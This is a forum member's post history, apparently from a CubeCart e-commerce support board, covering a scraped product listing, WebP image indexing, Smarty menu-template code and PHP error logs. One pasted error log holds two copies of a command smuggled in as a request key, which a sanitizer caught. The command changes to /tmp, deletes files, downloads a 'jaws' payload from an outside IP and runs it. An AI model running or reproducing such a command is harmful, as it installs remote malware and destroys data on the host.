Jump to content

Claudia

Member
  • Posts

    262
  • Joined

  • Last visited

  • Days Won

    2

Everything posted by Claudia

  1. I was checking my Google Webmaster today and received this (among many) under crawled - currently not indexed. https://www.cambargainstore.com/images/source/iron-flat-sad-swirl-pattern-handle/01-antique-all-cast-iron-sad-iron-with-swirl-pattern-handle-main.webp I searched sad iron with swirl pattern handle in Google and this came up Antique All Cast Iron Sad Iron with Swirl Pattern Handle 109.123.79https://109.123.79.170 › antique-all-cast-iron-sad-iron-w... FOR SALE Antique all cast iron sad iron with swirl or diagonal pattern handle. Measures 6L x 4W x 4-1/2H and weighs 5 lbs. 4.3 oz. Full of antique charm. This is the exact wording of my listing except for the IP adress. I looked up 109.123.79.170 and it came up with the host name o-2g0.com in Great Britain. I checked the blacklist status and it wasn't on the list. How did someone add an IP address to my listing like that? Thanks for all your help
  2. Mine too. I've contacted xml-sitemaps. Maybe they can shed some light on this.
  3. I have had a very sudden drop in my page indexing with Google. A lot have to do with the webp extension on my images. I had Google test one of the pages and this is what it shows. (in part). Is this normal, how it should look? I don't use the Cubecart sitemap. I have XML-Sitemaps including the one for images https://www.cambargainstore.com/images/source/bottle-coke-empty-minnesota-minneapolis/04-minneapolis-minnesota-vintage-empty-patd-christmas-coke-bottle-left.webp RIFF����WEBPVP8 ����P2 �* >m6�I$"�&"1��� �gm~�W�L‑��������ސ�4��‑���v�|8����yCg-�����y`�+�^^? ����_��O�<�~��­Ԇb/OW��u��h//~�~�6ܷd}t��z�y�^����?��������ߟ���w��T�[���‑3���_����G��� ��#�k |W���#����~������T��?��������� { `�K�E���A�ר�kX#W�\���П~A�u ��?� ��A�k7�6�ˬ��B_ǩ�|�v�^�/�Q���C[1]�ō%�x ���{Շ�&]jCk9˛a՘ D�i�+o~C:+�/�t�c*|�}��2'x���ϛ�j<v���,E+�)&��{�l�|6��)<��S1jF[1]�8�E�$v2T�~P�[1[���T�>���~�&��G��O�3��"�������+�̜`�@���d*���9?��pX���;�}
  4. nevermind .. found it I got it working Thanks
  5. I just noticed this. I add the alt / title to all images of products I have added since that feature was offered. When I hover over a thumbnail and it enlarges no matter what the image is it shows the title of the main image (on the hovered thumb). Also why don't my thumbs lineup with the main image? - have the row padding. https://www.cambargainstore.com/electric-warmer-plugin-yellow-ovals My code is highly modified from Foundation. If you need my code let me know. Thanks in advance Claudia Here's a link Sorry about link above
  6. I really don't have a reason. Just don't know that much about it and it kinda threw me when my image was changed without me knowing it was going to happen.
  7. Can I stop CC from automatically changing my photos from my original jpg to webp. Maybe make this an option? Thanks Claudia
  8. What happened to the "view all" in the category page pagination? If it was removed by design can I get it back? I can't upload my image to show you what I mean ... so ... < Previous 1 2 Next> No View All option Thanks for any and all help
  9. You are a wonderful human being!!!! Where did you find this?
  10. In my bottles and jars category I just wanted to put a solid border under the other soft drink bottles to separate the soda bottle from other bottles. I doubt I'd use it again. Do I put the > above {$BRANCH.name} Thanks for all your help on this Brian. I really appreciate it.
  11. {if isset($BRANCH.children)} <ul class="vnb-sub-cbd"> <li itemprop="name" class="vnb-sub-title">{$BRANCH.name}</li> {$BRANCH.children} </ul> {/if} There is no <li> for {$BRANCH.children} There is no ccs rule for has-sub-cbd . It's in the script $('.vnb-sub-cbd').hide(); $('.has-sub-cbd').hover(function(){ $(this).children('.vnb-sub-cbd').fadeToggle(200); }); Would something like this work for individual child styling? I know it's not right <li {if isset($BRANCH.children)}class="has-sub-cbd"{/if}> <a href="{$BRANCH.url}" title="{$BRANCH.name}"{if $VNB_CBD_BRANCH.cat_id == '40'class="pad-bottom" {else} class="vm-box-link-cbd">{$BRANCH.name} {if isset($BRANCH.children)}<svg class="icon icon-x1 has-sub-arrow-cbd"><use xlink:href="#icon-angle-right"></use></svg>{/if}</a> {if isset($BRANCH.children)} <ul class="vnb-sub-cbd"> <li itemprop="name" class="vnb-sub-title">{$BRANCH.name}</li> {$BRANCH.children} </ul> {/if} </li>
  12. I see what you mean about the icon-sprites.svg" file. Can a person add to this file? .vnb-sub-cbd a.vm-box-link-cbd { } worked but what if I wanted to style one sub differently than the others. Like cat ID 40 Promise I'll try not to ask anything else Can I move the sub box up a little so it's in the middle of the parent instead at the bottom
  13. I may want to change the > to a side triangle. I got this error when I tried to open the icon-sprites.svg" file. This page contains the following errors: error on line 1 at column 1: Document is empty Below is a rendering of the page up to the first error. Any idea about this: {$BRANCH.children} How can I get it it's own styling Do I put it in a <div> or <span> <div class=??> {$BRANCH.children} </div>
  14. Kinda, been working on it, again, all day .... still some stuff I can't figure out. For instance: where do I find the icons (>) How can I hide the children from small display. May have more questions My new tree code: <li {if isset($BRANCH.children)}class="has-sub-cbd"{/if}> <a href="{$BRANCH.url}" title="{$BRANCH.name}" class="vm-box-link-cbd">{$BRANCH.name} {if isset($BRANCH.children)}<svg class="icon icon-x1 has-sub-arrow-cbd"><use xlink:href="#icon-angle-right"></use></svg>{/if}</a> {if isset($BRANCH.children)} <ul class="vnb-sub-cbd"> <li itemprop="name" class="vnb-sub-title">{$BRANCH.name}</li> {$BRANCH.children} </ul> {/if} </li> icon-x1 I created this {$BRANCH.children} How can I get it it's own styling
  15. I have tried for days to do this but can’t figure out how. I have my vertical menu working but I don’t know how to put the >> (or sideways triangle) on the main category when it has children. Also, if I want my children styled different than the parent how do I do that. Here is my code. Thanks for any help! Skin/element.navigation_tree <li class="has-sub-cbd"> <a class="vm-box-link-cbd" href="{$BRANCH.url}" title="{$BRANCH.name}">{$BRANCH.name}</a> {if isset($BRANCH.children)} <ul class="vnb-sub-cbd"> <!-- <li itemprop="name" class="vnb-sub-title-cbd">{$BRANCH.name}</li> --> {$BRANCH.children} </ul> {/if} </li> I commented out <!-- <li itemprop="name" class="vnb-sub-title-cbd">{$BRANCH.name}</li> --> because I don’t want the main category name showing with the children. Skin/box.navigation {if $CATEGORIES} {$CATEGORIES} {else} <div id="vm-container"> <ul itemscope itemtype="http://www.schema.org/SiteNavigationElement" class="vm-top"> <li itemprop="name"><a class="vm-box-link-cbd" itemprop="url" href="{$ROOT_PATH}" title="{$LANG.common.home}"><svg class="icon"><use xlink:href="#icon-home"></use></svg>&nbsp;&nbsp;Home</a></li> <li> <a href="/listed-only-on-ebay" title="Listed only on eBay" class="vm-ebay-txt">Listed only on eBay</a></li> <li> <a href="/listed-only-on-etsy" title="Listed only on Etsy" class="vm-etsy-txt">Listed only on Etsy</a></li> {$NAVIGATION_TREE} </ul> </div> {/if}
  16. I made the changes as suggested in GITHub PHP 8 Warning #3397 - $basket_array['weight'] ?? 0. Now I get these warnings. I know some are not related. [04-Oct-2023 15:32:50 America/Louisville] PHP Warning: Security Warning: Illegal array key "cd_/tmp;rm_-rf_*;wget_94_158_247_123/jaws;sh_/tmp/jaws" was detected and was removed. in /home/xxxxxxx/public_html/classes/sanitize.class.php on line 114 [04-Oct-2023 17:22:29 America/Louisville] PHP Deprecated: ucwords(): Passing null to parameter #1 ($string) of type string is deprecated in /home/xxxxxxx/public_html/cache/skin/c6ff5523b42eda7c097b9ded7c507de36a425832_0.file.orders.index.php.php on line 673 [04-Oct-2023 17:30:45 America/Louisville] PHP Warning: Undefined array key "productOptions" in /home/xxxxxxx/public_html/admin_OE2vfW/sources/orders.index.inc.php on line 91 [04-Oct-2023 17:57:09 America/Louisville] PHP Warning: Undefined array key "productOptions" in /home/xxxxxxx/public_html/admin_OE2vfW/sources/orders.index.inc.php on line 116 [04-Oct-2023 17:57:09 America/Louisville] PHP Warning: Undefined array key "custom" in /home/xxxxxxx/public_html/admin_OE2vfW/sources/orders.index.inc.php on line 124 [04-Oct-2023 18:28:51 America/Louisville] PHP Warning: Undefined array key "cart_order_id" in /home/xxxxxxx/public_html/classes/cubecart.class.php on line 2778 [05-Oct-2023 03:50:09 UTC] PHP Fatal error: Uncaught mysqli_sql_exception: No such file or directory in /home/xxxxxxx/public_html/classes/db/mysqli.class.php:37 Stack trace: #0 /home/xxxxxxx/public_html/classes/db/mysqli.class.php(37): mysqli->__construct() #1 /home/xxxxxxx/public_html/classes/db/mysqli.class.php(64): Database->__construct() #2 /home/xxxxxxx/public_html/controllers/controller.index.inc.php(22): Database::getInstance() #3 /home/xxxxxxx/public_html/index.php(27): include('/home/cambarga/...') #4 {main} thrown in /home/xxxxxxx/public_html/classes/db/mysqli.class.php on line 37 [04-Oct-2023 23:50:46 America/Louisville] PHP Warning: Invalid Security Token in /home/xxxxxxx/public_html/classes/sanitize.class.php on line 155 [04-Oct-2023 23:50:46 America/Louisville] PHP Warning: Undefined global variable $_GET in /home/xxxxxxx/public_html/includes/functions.inc.php on line 218 [05-Oct-2023 05:47:24 America/Louisville] PHP Warning: Security Warning: Illegal array key "cd_/tmp;rm_-rf_*;wget_121_62_21_23/jaws;sh_/tmp/jaws" was detected and was removed. in /home/xxxxxxx/public_html/classes/sanitize.class.php on line 114
  17. Thanks again Brian. The URL has been deleted. I'll look into the first one.
  18. For the last few days I keep getting these warnings over and over in my cPanel error log. Nothing in admin error log. Thanks for any and all help [02-Oct-2023 12:53:02 America/Louisville] PHP Warning: Trying to access array offset on value of type bool in /home/cambarga/public_html/admin_OE2vfW/sources/orders.index.inc.php on line 307 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: Entity: line 1: parser error : Opening and ending tag mismatch: link line 1 and head in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: al-scale=1&quot;&gt;&lt;link href=&quot;/cdn-cgi/styles/challenges.css&quot; rel=&quot;stylesheet&quot;&gt;&lt;/head&gt; in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: ^ in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: Entity: line 1: parser error : xmlParseEntityRef: no name in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: ge/v1?ray=80f8b6039edadd68';window._cf_chl_opt.cOgUHash = location.hash === '' &amp; in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' &amp; in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: 1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' &amp;&amp; in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: OgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history &amp; in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: ^ in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: gUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history &amp;&amp; in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: nt.getElementsByTagName('head')[0].appendChild(cpo);}());&lt;/script&gt;&lt;/body&gt;&lt;/html&gt; in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: ^ in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: Entity: line 1: parser error : Premature end of data in tag meta line 1 in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:34:35 America/Louisville] PHP Warning: String could not be parsed as XML in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 463
  19. Can I do this? I don't like the way the ship date is formatted 'all_ship_date' => $order['all_ship_date'], 'venue_ship_product' => $order['venue_ship_product'], 'all_shipping_used' => $order['all_shipping_used'], <div class="title-mid marg-top">{$LANG.common.delivery}</div> {if !empty($DELIVERY.all_ship_date)} <div class="row"> <div class="small-6 medium-3 columns">Shipping Date:</div> <div class="small-6 medium-9 columns">{$DELIVERY.all_ship_date}</div> </div> {/if} {if !empty($DELIVERY.venue_ship_product)} <div class="row"> <div class="small-6 medium-3 columns">Shipping Paid For:</div> <div class="small-6 medium-9 columns">{$DELIVERY.venue_ship_product}</div> </div> {/if} {if !empty($DELIVERY.all_shipping_used)} <div class="row"> <div class="small-6 medium-3 columns">Shipping Used:</div> <div class="small-6 medium-9 columns">{$DELIVERY.all_shipping_used}</div> </div> {/if}
  20. do you mean 'alt_ship_date' or my table all_ship_date
  21. All of those fields are in the order_summary database, but I can put them where needed for the code snippet to work. Or, if possible, I'd rather change the stock code.
×
×
  • Create New...